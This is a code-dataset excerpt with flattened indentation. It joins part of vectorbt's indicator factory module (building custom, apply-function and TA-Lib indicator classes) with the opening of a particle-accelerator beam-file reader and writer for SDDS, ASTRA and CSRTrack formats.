**pipeline_kwargs: Keyword arguments passed to `run_pipeline`.
Can be overwritten by any run method.
Can contain default values for `param_names` and `in_output_names`,
but also custom positional and keyword arguments passed to the `custom_func`.
Returns:
`Indicator`, and optionally other objects that are returned by `custom_func`
and exceed `output_names`.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_apply_func` example.
```python-repl
>>> @njit
>>> def apply_func_nb(i, ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1[i] + arg1, ts2 * p2[i] + arg2
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... return vbt.base.combine_fns.apply_and_concat_multiple_nb(
... len(p1), apply_func_nb, ts1, ts2, p1, p2, arg1, arg2)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_custom_func(custom_func, var_args=True, arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
The difference between `apply_func_nb` here and in `IndicatorFactory.from_apply_func` is that
here it takes the index of the current parameter combination that can be used for parameter selection.
You can also remove the entire `apply_func_nb` and define your logic in `custom_func`
(which shouldn't necessarily be Numba-compiled):
```python-repl
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... input_shape = ts1.shape
... n_params = len(p1)
... out1 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... out2 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... for k in range(n_params):
... for col in range(input_shape[1]):
... for i in range(input_shape[0]):
... out1[i, input_shape[1] * k + col] = ts1[i, col] * p1[k] + arg1
... out2[i, input_shape[1] * k + col] = ts2[i, col] * p2[k] + arg2
... return out1, out2
```
"""
Indicator = self.Indicator
short_name = self.short_name
prepend_name = self.prepend_name
input_names = self.input_names
param_names = self.param_names
in_output_names = self.in_output_names
output_names = self.output_names
all_input_names = input_names + param_names + in_output_names
setattr(Indicator, 'custom_func', custom_func)
def _merge_settings(old_settings, new_settings, allowed_keys=None):
new_settings = merge_dicts(old_settings, new_settings)
if len(new_settings) > 0 and allowed_keys is not None:
checks.assert_dict_valid(new_settings, allowed_keys)
return new_settings
def _resolve_refs(input_list, param_list, in_output_list):
# You can reference anything between inputs, parameters, and in-place outputs
# even parameter to input (thanks to broadcasting)
all_inputs = list(input_list + param_list + in_output_list)
for i in range(len(all_inputs)):
input = all_inputs[i]
is_default = False
if isinstance(input, DefaultParam):
input = input.value
is_default = True
if isinstance(input, str):
if input in all_input_names:
new_input = all_inputs[all_input_names.index(input)]
if is_default:
new_input = DefaultParam(new_input)
all_inputs[i] = new_input
input_list = all_inputs[:len(input_list)]
all_inputs = all_inputs[len(input_list):]
param_list = all_inputs[:len(param_list)]
in_output_list = all_inputs[len(param_list):]
return input_list, param_list, in_output_list
def _extract_inputs(args):
input_list = args[:len(input_names)]
checks.assert_len_equal(input_list, input_names)
args = args[len(input_names):]
param_list = args[:len(param_names)]
checks.assert_len_equal(param_list, param_names)
args = args[len(param_names):]
in_output_list = args[:len(in_output_names)]
checks.assert_len_equal(in_output_list, in_output_names)
args = args[len(in_output_names):]
if not var_args and len(args) > 0:
raise TypeError("Variable length arguments are not supported by this function "
"(var_args is set to False)")
input_list, param_list, in_output_list = _resolve_refs(input_list, param_list, in_output_list)
return input_list, param_list, in_output_list, args
for k, v in pipeline_kwargs.items():
if k in param_names and not isinstance(v, DefaultParam):
pipeline_kwargs[k] = DefaultParam(v) # track default params
pipeline_kwargs = merge_dicts({k: None for k in in_output_names}, pipeline_kwargs)
# Display default parameters and in-place outputs in the signature
default_kwargs = {}
for k in list(pipeline_kwargs.keys()):
if k in input_names or k in param_names or k in in_output_names:
default_kwargs[k] = pipeline_kwargs.pop(k)
if var_args and keyword_only_args:
raise ValueError("var_args and keyword_only_args cannot be used together")
# Add private run method
def_run_kwargs = dict(
short_name=short_name,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run(cls,
*args,
_param_settings=param_settings,
_in_output_settings=in_output_settings,
_pipeline_kwargs=pipeline_kwargs,
**kwargs):
_short_name = kwargs.pop('short_name', def_run_kwargs['short_name'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.pop('param_settings', {}),
[param_names]
)
_in_output_settings = _merge_settings(
_in_output_settings,
kwargs.pop('in_output_settings', {}),
[in_output_names]
)
if _hide_params is None:
_hide_params = []
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Prepare column levels
level_names = []
hide_levels = []
for i, pname in enumerate(param_names):
level_name = _short_name + '_' + pname if prepend_name else pname
level_names.append(level_name)
if pname in _hide_params or (_hide_default and isinstance(param_list[i], DefaultParam)):
hide_levels.append(i)
level_names = list(level_names)
param_list = [params.value if isinstance(params, DefaultParam) else params for params in param_list]
# Run the pipeline
results = run_pipeline(
len(output_names), # number of returned outputs
custom_func,
*args,
require_input_shape=require_input_shape,
input_list=input_list,
in_output_list=in_output_list,
param_list=param_list,
level_names=level_names,
hide_levels=hide_levels,
param_settings=[_param_settings.get(n, {}) for n in param_names],
in_output_settings=[_in_output_settings.get(n, {}) for n in in_output_names],
**merge_dicts(_pipeline_kwargs, kwargs)
)
# Return the raw result if any of the flags are set
if kwargs.get('return_raw', False) or kwargs.get('return_cache', False):
return results
# Unpack the result
wrapper, \
new_input_list, \
input_mapper, \
in_output_list, \
output_list, \
new_param_list, \
mapper_list, \
other_list = results
# Create a new instance
obj = cls(
wrapper,
new_input_list,
input_mapper,
in_output_list,
output_list,
new_param_list,
mapper_list,
short_name,
level_names
)
if len(other_list) > 0:
return (obj, *tuple(other_list))
return obj
setattr(Indicator, '_run', _run)
# Add public run method
# Create function dynamically to provide user with a proper signature
def compile_run_function(func_name, docstring, default_kwargs):
pos_names = []
main_kw_names = []
other_kw_names = []
for k in input_names + param_names:
if k in default_kwargs:
main_kw_names.append(k)
else:
pos_names.append(k)
main_kw_names.extend(in_output_names) # in_output_names are keyword-only
for k, v in default_kwargs.items():
if k not in pos_names and k not in main_kw_names:
other_kw_names.append(k)
_0 = func_name
_1 = '*, ' if keyword_only_args else ''
_2 = []
if require_input_shape:
_2.append('input_shape')
_2.extend(pos_names)
_2 = ', '.join(_2) + ', ' if len(_2) > 0 else ''
_3 = '*args, ' if var_args else ''
_4 = ['{}={}'.format(k, k) for k in main_kw_names + other_kw_names]
_4 = ', '.join(_4) + ', ' if len(_4) > 0 else ''
_5 = docstring
_6 = all_input_names
_6 = ', '.join(_6) + ', ' if len(_6) > 0 else ''
_7 = []
if require_input_shape:
_7.append('input_shape')
_7.extend(other_kw_names)
_7 = ['{}={}'.format(k, k) for k in _7]
_7 = ', '.join(_7) + ', ' if len(_7) > 0 else ''
func_str = "@classmethod\n" \
"def {0}(cls, {1}{2}{3}{4}**kwargs):\n" \
" \"\"\"{5}\"\"\"\n" \
" return cls._{0}({6}{3}{7}**kwargs)".format(
_0, _1, _2, _3, _4, _5, _6, _7
)
scope = {**dict(DefaultParam=DefaultParam), **default_kwargs}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
return scope[func_name]
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_docstring = """Run `{0}` indicator.
{1}
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.""".format(_0, _1)
run = compile_run_function('run', run_docstring, def_run_kwargs)
setattr(Indicator, 'run', run)
if len(param_names) > 0:
# Add private run_combs method
def_run_combs_kwargs = dict(
r=2,
param_product=False,
comb_func=itertools.combinations,
speedup=True,
short_names=None,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run_combs(cls,
*args,
_param_settings=param_settings,
**kwargs):
_r = kwargs.pop('r', def_run_combs_kwargs['r'])
_param_product = kwargs.pop('param_product', def_run_combs_kwargs['param_product'])
_comb_func = kwargs.pop('comb_func', def_run_combs_kwargs['comb_func'])
_speedup = kwargs.pop('speedup', def_run_combs_kwargs['speedup'])
_short_names = kwargs.pop('short_names', def_run_combs_kwargs['short_names'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.get('param_settings', {}), # get, not pop
[param_names]
)
if _hide_params is None:
_hide_params = []
if _short_names is None:
_short_names = [f'{short_name}_{str(i + 1)}' for i in range(_r)]
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Hide params
for i, pname in enumerate(param_names):
if _hide_default and isinstance(param_list[i], DefaultParam):
if pname not in _hide_params:
_hide_params.append(pname)
param_list[i] = param_list[i].value
checks.assert_len_equal(param_list, param_names)
# Prepare params
param_settings_list = [_param_settings.get(n, {}) for n in param_names]
for i in range(len(param_list)):
is_tuple = param_settings_list[i].get('is_tuple', False)
is_array_like = param_settings_list[i].get('is_array_like', False)
param_list[i] = params_to_list(param_list[i], is_tuple, is_array_like)
if _param_product:
param_list = create_param_product(param_list)
else:
param_list = broadcast_params(param_list)
if not isinstance(param_list, (tuple, list)):
param_list = [param_list]
# Speed up by pre-calculating raw outputs
if _speedup:
raw_results = cls._run(
*input_list,
*param_list,
*in_output_list,
*args,
return_raw=True,
speedup=False,
**kwargs
)
kwargs['use_raw'] = raw_results # use them next time
# Generate indicator instances
instances = []
if _comb_func == itertools.product:
param_lists = zip(*_comb_func(zip(*param_list), repeat=_r))
else:
param_lists = zip(*_comb_func(zip(*param_list), _r))
for i, param_list in enumerate(param_lists):
instances.append(cls._run(
*input_list,
*zip(*param_list),
*in_output_list,
*args,
short_name=_short_names[i],
hide_params=_hide_params,
hide_default=_hide_default,
speedup=False,
**kwargs
))
return tuple(instances)
setattr(Indicator, '_run_combs', _run_combs)
# Add public run_combs method
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_combs_docstring = """Create a combination of multiple `{0}` indicators using function `comb_func`.
{1}
`comb_func` must accept an iterable of parameter tuples and `r`.
Also accepts all combinatoric iterators from itertools such as `itertools.combinations`.
Pass `r` to specify how many indicators to run.
Pass `short_names` to specify the short name for each indicator.
Set `speedup` to True to first compute raw outputs for all parameters,
and then use them to build each indicator (faster).
Other keyword arguments are passed to `{0}.run`.""".format(_0, _1)
run_combs = compile_run_function('run_combs', run_combs_docstring, def_run_combs_kwargs)
setattr(Indicator, 'run_combs', run_combs)
return Indicator
def from_apply_func(self, apply_func, cache_func=None, pass_packed=False, kwargs_to_args=None,
numba_loop=False, use_ray=False, ray_kwargs=None, **kwargs):
"""Build indicator class around a custom apply function.
In contrast to `IndicatorFactory.from_custom_func`, this method handles a lot of things for you,
such as caching, parameter selection, and concatenation. Your part is writing a function `apply_func`
that accepts a selection of parameters (single values as opposed to multiple values in
`IndicatorFactory.from_custom_func`) and does the calculation. It then automatically concatenates
the resulting arrays into a single array per output.
While this approach is simpler, it's also less flexible, since we can only work with
one parameter selection at a time and can't view all parameters. The UDF `apply_func` also can't
take keyword arguments, nor it can return anything other than outputs listed in `output_names`.
!!! note
If `apply_func` is a Numba-compiled function:
* All inputs are automatically converted to NumPy arrays
* Each argument in `*args` must be of a Numba-compatible type
* You cannot pass keyword arguments
* Your outputs must be arrays of the same shape, data type and data order
Args:
apply_func (callable): A function that takes inputs, selection of parameters, and
other arguments, and does calculations to produce outputs.
Arguments are passed to `apply_func` in the following order:
* `input_shape` if `pass_input_shape` is set to True and `input_shape` not in `kwargs_to_args`
* `col` if `per_column` and `pass_col` are set to True and `col` not in `kwargs_to_args`
* broadcast time-series arrays corresponding to `input_names`
* broadcast in-place output arrays corresponding to `in_output_names`
* single parameter selection corresponding to `param_names`
* variable arguments if `var_args` is set to True
* arguments listed in `kwargs_to_args`
* `flex_2d` if `pass_flex_2d` is set to True and `flex_2d` not in `kwargs_to_args`
* keyword arguments if `apply_func` is not Numba-compiled
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input.
cache_func (callable): A caching function to preprocess data beforehand.
Takes the same arguments as `apply_func`. Should return a single object or a tuple of objects.
All returned objects will be passed unpacked as last arguments to `apply_func`.
Can be Numba-compiled.
pass_packed (bool): Whether to pass packed tuples for inputs, in-place outputs, and parameters.
kwargs_to_args (list of str): Keyword arguments from `kwargs` dict to pass as
positional arguments to the apply function.
Should be used together with `numba_loop` set to True since Numba doesn't support
variable keyword arguments.
Defaults to []. Order matters.
numba_loop (bool): Whether to loop using Numba.
Set to True when iterating large number of times over small input,
but note that Numba doesn't support variable keyword arguments.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
Additionally, each run method now supports `use_ray` argument, which indicates
whether to use Ray to execute `apply_func` in parallel. Only works with `numba_loop` set to False.
See `vectorbt.base.combine_fns.ray_apply` for related keyword arguments.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_custom_func` example.
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1 + arg1, ts2 * p2 + arg2
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_apply_func(
... apply_func_nb, var_args=True,
... kwargs_to_args=['arg2'], arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
"""
Indicator = self.Indicator
setattr(Indicator, 'apply_func', apply_func)
if kwargs_to_args is None:
kwargs_to_args = []
module_name = self.module_name
output_names = self.output_names
in_output_names = self.in_output_names
param_names = self.param_names
num_ret_outputs = len(output_names)
# Build a function that selects a parameter tuple
# Do it here to avoid compilation with Numba every time custom_func is run
_0 = "i"
_0 += ", args_before"
_0 += ", input_tuple"
if len(in_output_names) > 0:
_0 += ", in_output_tuples"
if len(param_names) > 0:
_0 += ", param_tuples"
_0 += ", *args"
if not numba_loop:
_0 += ", **_kwargs"
_1 = "*args_before"
if pass_packed:
_1 += ", input_tuple"
if len(in_output_names) > 0:
_1 += ", in_output_tuples[i]"
else:
_1 += ", ()"
if len(param_names) > 0:
_1 += ", param_tuples[i]"
else:
_1 += ", ()"
else:
_1 += ", *input_tuple"
if len(in_output_names) > 0:
_1 += ", *in_output_tuples[i]"
if len(param_names) > 0:
_1 += ", *param_tuples[i]"
_1 += ", *args"
if not numba_loop:
_1 += ", **_kwargs"
func_str = "def select_params_func({0}):\n return apply_func({1})".format(_0, _1)
scope = {'apply_func': apply_func}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
select_params_func = scope['select_params_func']
if module_name is not None:
select_params_func.__module__ = module_name
if numba_loop:
select_params_func = njit(select_params_func)
def custom_func(input_list, in_output_list, param_list, *args, input_shape=None,
col=None, flex_2d=None, return_cache=False, use_cache=None, use_ray=False, **_kwargs):
"""Custom function that forwards inputs and parameters to `apply_func`."""
if use_ray:
if len(in_output_names) > 0:
raise ValueError("Ray doesn't support in-place outputs")
if numba_loop:
if use_ray:
raise ValueError("Ray cannot be used within Numba")
if num_ret_outputs > 1:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_nb
elif num_ret_outputs == 1:
apply_and_concat_func = combine_fns.apply_and_concat_one_nb
else:
apply_and_concat_func = combine_fns.apply_and_concat_none_nb
else:
if num_ret_outputs > 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_multiple
elif num_ret_outputs == 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_one_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_one
else:
if use_ray:
raise ValueError("Ray requires regular outputs")
apply_and_concat_func = combine_fns.apply_and_concat_none
n_params = len(param_list[0]) if len(param_list) > 0 else 1
input_tuple = tuple(input_list)
in_output_tuples = list(zip(*in_output_list))
param_tuples = list(zip(*param_list))
args_before = ()
if input_shape is not None and 'input_shape' not in kwargs_to_args:
args_before += (input_shape,)
if col is not None and 'col' not in kwargs_to_args:
args_before += (col,)
# Pass some keyword arguments as positional (required by numba)
more_args = ()
for key in kwargs_to_args:
value = _kwargs.pop(key) # important: remove from kwargs
more_args += (value,)
if flex_2d is not None and 'flex_2d' not in kwargs_to_args:
more_args += (flex_2d,)
# Caching
cache = use_cache
if cache is None and cache_func is not None:
_in_output_list = in_output_list
_param_list = param_list
if checks.is_numba_func(cache_func):
if len(in_output_list) > 0:
_in_output_list = [to_typed_list(in_outputs) for in_outputs in in_output_list]
if len(param_list) > 0:
_param_list = [to_typed_list(params) for params in param_list]
cache = cache_func(
*args_before,
*input_tuple,
*_in_output_list,
*_param_list,
*args,
*more_args,
**_kwargs
)
if return_cache:
return cache
if cache is None:
cache = ()
if not isinstance(cache, tuple):
cache = (cache,)
if len(in_output_names) > 0:
_in_output_tuples = in_output_tuples
if numba_loop:
_in_output_tuples = to_typed_list(_in_output_tuples)
_in_output_tuples = (_in_output_tuples,)
else:
_in_output_tuples = ()
if len(param_names) > 0:
_param_tuples = param_tuples
if numba_loop:
_param_tuples = to_typed_list(_param_tuples)
_param_tuples = (_param_tuples,)
else:
_param_tuples = ()
return apply_and_concat_func(
n_params,
select_params_func,
args_before,
input_tuple,
*_in_output_tuples,
*_param_tuples,
*args,
*more_args,
*cache,
**_kwargs
)
return self.from_custom_func(custom_func, as_lists=True, **kwargs)
@classmethod
def from_talib(cls, func_name, init_kwargs=None, **kwargs):
"""Build indicator class around a TA-Lib function.
Requires [TA-Lib](https://github.com/mrjbq7/ta-lib) installed.
For input, parameter and output names, see [docs](https://github.com/mrjbq7/ta-lib/blob/master/docs/index.md).
Args:
func_name (str): Function name.
init_kwargs (dict): Keyword arguments passed to `IndicatorFactory`.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
## Example
```python-repl
>>> SMA = vbt.IndicatorFactory.from_talib('SMA')
>>> sma = SMA.run(price, timeperiod=[2, 3])
>>> sma.real
sma_timeperiod 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
```
To get help on a function, use the `help` command:
```python-repl
>>> help(SMA.run)
Help on method run:
run(close, timeperiod=30, short_name='sma', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `SMA` indicator.
* Inputs: `close`
* Parameters: `timeperiod`
* Outputs: `real`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
"""
import talib
from talib import abstract
talib_func = getattr(talib, func_name)
info = abstract.Function(func_name)._Function__info
input_names = []
for in_names in info['input_names'].values():
if isinstance(in_names, (list, tuple)):
input_names.extend(list(in_names))
else:
input_names.append(in_names)
class_name = info['name']
class_docstring = "{}, {}".format(info['display_name'], info['group'])
short_name = info['name'].lower()
param_names = list(info['parameters'].keys())
output_names = info['output_names']
output_flags = info['output_flags']
def apply_func(input_list, _, param_tuple):
# TA-Lib functions can only process 1-dim arrays
n_input_cols = input_list[0].shape[1]
outputs = []
for col in range(n_input_cols):
outputs.append(talib_func(
*map(lambda x: x[:, col], input_list),
*param_tuple
))
if isinstance(outputs[0], tuple): # multiple outputs
outputs = list(zip(*outputs))
return list(map(np.column_stack, outputs))
return np.column_stack(outputs)
TALibIndicator = cls(
**merge_dicts(
dict(
class_name=class_name,
class_docstring=class_docstring,
short_name=short_name,
input_names=input_names,
param_names=param_names,
output_names=output_names,
output_flags=output_flags
),
init_kwargs
)
).from_apply_func(
apply_func,
pass_packed=True,
**info['parameters'],
**kwargs
)
return TALibIndicator
| [
"[email protected]"
] | |
8cf1a15642d330e409b9b8f3de5b9c053fe45d01 | ea1d88d99e854ceb7f5620bd371349acb51f6607 | /SimulationFramework/Modules/read_beam_file.py | 3b751981b3a0cbed54c6f0a08b7091980e5de51f | [] | no_license | VELA-CLARA-software/SimFramed | 7dee4efc86531662495eed1bf2a3e9ec8287b640 | b647590f8cb87ea2bffed6733012b6e9141032bb | refs/heads/master | 2022-12-07T05:13:46.486342 | 2020-08-10T13:52:13 | 2020-08-10T13:52:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56,824 | py | import os, time, csv, sys, subprocess
import copy
import h5py
import numpy as np
import munch
import scipy.constants as constants
from scipy.spatial.distance import cdist
from scipy.spatial import ConvexHull
from scipy.stats import gaussian_kde
from itertools import compress
try:
import sdds
except:
print('sdds failed to load')
pass
sys.path.append(os.path.abspath(__file__+'/../../'))
import SimulationFramework.Modules.read_gdf_file as rgf
import SimulationFramework.Modules.minimumVolumeEllipse as mve
MVE = mve.EllipsoidTool()
class beam(munch.Munch):
particle_mass = constants.m_e
E0 = particle_mass * constants.speed_of_light**2
E0_eV = E0 / constants.elementary_charge
q_over_c = (constants.elementary_charge / constants.speed_of_light)
speed_of_light = constants.speed_of_light
def __init__(self, sddsindex=0):
self.beam = {}
self.sddsindex = sddsindex
def set_particle_mass(self, mass=constants.m_e):
self.particle_mass = mass
def normalise_to_ref_particle(self, array, index=0,subtractmean=False):
array = copy.copy(array)
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - array[0]#np.mean(array)
return array
def reset_dicts(self):
self.beam = {}
self.twiss = {}
self.slice = {}
self._tbins = []
self._pbins = []
def read_SDDS_beam_file(self, fileName, charge=None, ascii=False):
self.reset_dicts()
self.sdds = sdds.SDDS(self.sddsindex)
self.sdds.load(fileName)
for col in range(len(self.sdds.columnName)):
if len(self.sdds.columnData[col]) == 1:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col][0])
else:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col])
self.SDDSparameters = dict()
for param in range(len(self.sdds.parameterName)):
self.SDDSparameters[self.sdds.parameterName[param]] = self.sdds.parameterData[param]
# print 'self.SDDSparameterNames = ', self.SDDSparameterNames
self.beam['code'] = "SDDS"
cp = self.beam['p'] * self.E0_eV
cpz = cp / np.sqrt(self.beam['xp']**2 + self.beam['yp']**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = self.beam['t']
self.beam['z'] = (-1*self.Bz * constants.speed_of_light) * (self.t-np.mean(self.t)) #np.full(len(self.t), 0)
if 'Charge' in self.SDDSparameters and len(self.SDDSparameters['Charge']) > 0:
self.beam['total_charge'] = self.SDDSparameters['Charge'][0]
elif charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
self.beam['charge'] = []
def write_SDDS_file(self, filename, ascii=False, xyzoffset=[0,0,0]):
"""Save an SDDS file using the SDDS class."""
xoffset = xyzoffset[0]
yoffset = xyzoffset[1]
zoffset = xyzoffset[2] # Don't think I need this because we are using t anyway...
x = sdds.SDDS(self.sddsindex)
if ascii:
x.mode = x.SDDS_ASCII
else:
x.mode = x.SDDS_BINARY
# {x, xp, y, yp, t, p, particleID}
Cnames = ["x", "xp", "y", "yp", "t","p"]
Ccolumns = ['x', 'xp', 'y', 'yp', 't', 'BetaGamma']
Ctypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE]
Csymbols = ["", "x'","","y'","",""]
Cunits = ["m","","m","","s","m$be$nc"]
Ccolumns = [np.array(self.x) - float(xoffset), self.xp, np.array(self.y) - float(yoffset), self.yp, self.t , self.cp/self.E0_eV]
# {Step, pCentral, Charge, Particles, IDSlotsPerBunch}
Pnames = ["pCentral", "Charge", "Particles"]
Ptypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_LONG]
Psymbols = ["p$bcen$n", "", ""]
Punits = ["m$be$nc", "C", ""]
parameterData = [[np.mean(self.BetaGamma)], [abs(self.beam['total_charge'])], [len(self.x)]]
for i in range(len(Ptypes)):
x.defineParameter(Pnames[i], Psymbols[i], Punits[i],"","", Ptypes[i], "")
x.setParameterValueList(Pnames[i], parameterData[i])
for i in range(len(Ctypes)):
# name, symbol, units, description, formatString, type, fieldLength
x.defineColumn(Cnames[i], Csymbols[i], Cunits[i],"","", Ctypes[i], 0)
x.setColumnValueLists(Cnames[i], [list(Ccolumns[i])])
x.save(filename)
def set_beam_charge(self, charge):
self.beam['total_charge'] = charge
def read_csv_file(self, file, delimiter=' '):
with open(file, 'r') as f:
data = np.array([l for l in csv.reader(f, delimiter=delimiter, quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)])
return data
def write_csv_file(self, file, data):
if sys.version_info[0] > 2:
with open(file, 'w', newline='') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
else:
with open(file, 'wb') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
def read_astra_beam_file(self, file, normaliseZ=False):
starttime = time.time()
self.reset_dicts()
data = self.read_csv_file(file)
# datanp = np.loadtxt(file)
self.interpret_astra_data(data, normaliseZ=normaliseZ)
# def read_hdf5_beam(self, data):
# self.reset_dicts()
# self.interpret_astra_data(data)
def interpret_astra_data(self, data, normaliseZ=False):
x, y, z, cpx, cpy, cpz, clock, charge, index, status = np.transpose(data)
zref = z[0]
self.beam['code'] = "ASTRA"
self.beam['reference_particle'] = data[0]
# if normaliseZ:
# self.beam['reference_particle'][2] = 0
self.beam['longitudinal_reference'] = 'z'
znorm = self.normalise_to_ref_particle(z, subtractmean=True)
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
clock = self.normalise_to_ref_particle(clock, subtractmean=True)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = 1.0e-9*clock
self.beam['charge'] = 1.0e-9*charge
self.beam['index'] = index
self.beam['status'] = status
# print self.Bz
self.beam['t'] = [clock if status == -1 else ((z-zref) / (-1 * Bz * constants.speed_of_light)) for status, z, Bz, clock in zip(self.beam['status'], z, self.Bz, self.beam['clock'])]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_csrtrack_beam_file(self, file):
self.reset_dicts()
data = self.read_csv_file(file)
self.beam['code'] = "CSRTrack"
self.beam['reference_particle'] = data[0]
self.beam['longitudinal_reference'] = 'z'
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = np.full(len(self.x), 0)
